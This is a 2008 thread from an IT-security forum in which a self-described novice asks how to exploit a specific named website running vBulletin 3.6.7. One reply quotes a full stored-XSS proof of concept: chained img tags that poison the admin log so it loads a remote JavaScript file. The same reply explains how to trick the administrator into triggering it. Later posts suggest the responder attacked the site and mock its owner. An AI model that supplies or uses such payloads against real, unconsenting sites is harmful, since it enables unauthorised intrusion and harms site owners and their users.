Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 79
Members: 0
Total: 79
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> easy?
Post new topicReply to topic View previous topic :: View next topic
easy?
PostPosted: Thu Aug 07, 2008 4:30 pm Reply with quote
Iplox
Active user
Active user
Joined: Jul 29, 2008
Posts: 28




www.rscrackers.net


vB 3.6.7


exploitable??
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 6:31 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Not directly but yes.
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 6:54 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




There is an XSS bug in that version as Google says, or Secunia if you prefer.
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 7:21 pm Reply with quote
Iplox
Active user
Active user
Joined: Jul 29, 2008
Posts: 28




can you tell me how
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 8:12 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




Look at this:

http://securityreason.com/securityalert/4000

read carefullly. It's a bit elaborated.
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 8:22 pm Reply with quote
Iplox
Active user
Active user
Joined: Jul 29, 2008
Posts: 28




can you tell me how to us XSS, im a complete noob
View user's profile Send private message
PostPosted: Thu Aug 07, 2008 9:19 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




Uch, it's a big big big big topic, believe me. You should read something about it. It's really interesting, and very very creative. I built a Javascript worm once, very funny indeed ^_^
View user's profile Send private message
PostPosted: Fri Aug 08, 2008 11:25 am Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Ok Iplox, basically it (roughly) involves you poisoning a page with javascript that you can then using this against other people in the form of a malicious attack.

The advisory basically explains this:
You need to execute the following HTML to "poision" the targets adminlog.
Quote:
<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri

'/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<scrip

t
'/*" />
<img
src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'

/*"
/>
<!--edit to match your data -->
<img
src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/

*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip

'/*"
/>
<!-- end edit -->
<img
src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*"
/>
<img
src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd

%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>"
/>
</body>
</html>


Basically It just posions the adminlog entries and will execute any javascript file you point it to. You then need to convince the admin to visit the adminlog page, which in turn will render javascript include allowing you to include any javascript file.
The advisory dosen't explain what to do next (advisiories are designed for security professionals and as such are not guides.), but basically you need to craft a javascript file with the malicious code you want.
View user's profile Send private message
PostPosted: Fri Aug 08, 2008 12:36 pm Reply with quote
oniric
Advanced user
Advanced user
Joined: Jul 24, 2008
Posts: 65




So now you understand why I said it's necessary to be very creative ^_^ Also knowing javascript is extremely important!
View user's profile Send private message
PostPosted: Sun Aug 24, 2008 8:53 pm Reply with quote
Cmd19872002
Beginner
Beginner
Joined: Aug 24, 2008
Posts: 1




Iplox you better watch what your trying todo. I am the owner of www.rscrackers.net (and procrackers.com/net) If you know whats good for you, you would stand clear of trying to sql inject any site.

~Cmd
View user's profile Send private message
PostPosted: Sun Aug 24, 2008 9:05 pm Reply with quote
lenny
Valuable expert
Valuable expert
Joined: May 15, 2008
Posts: 275




Sorry, i may have beaten him there. Look after your servers, serves you right for not keeping updated on security!

Anyway, no harm was done.


Last edited by lenny on Mon Aug 25, 2008 10:26 am; edited 1 time in total
View user's profile Send private message
PostPosted: Mon Aug 25, 2008 9:52 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




lol!! Laughing

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Tue Sep 02, 2008 1:00 am Reply with quote
-AO-
Advanced user
Advanced user
Joined: Jul 15, 2008
Posts: 205
Location: United States




Owned.

Laughing
View user's profile Send private message Yahoo Messenger
easy?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.054 Seconds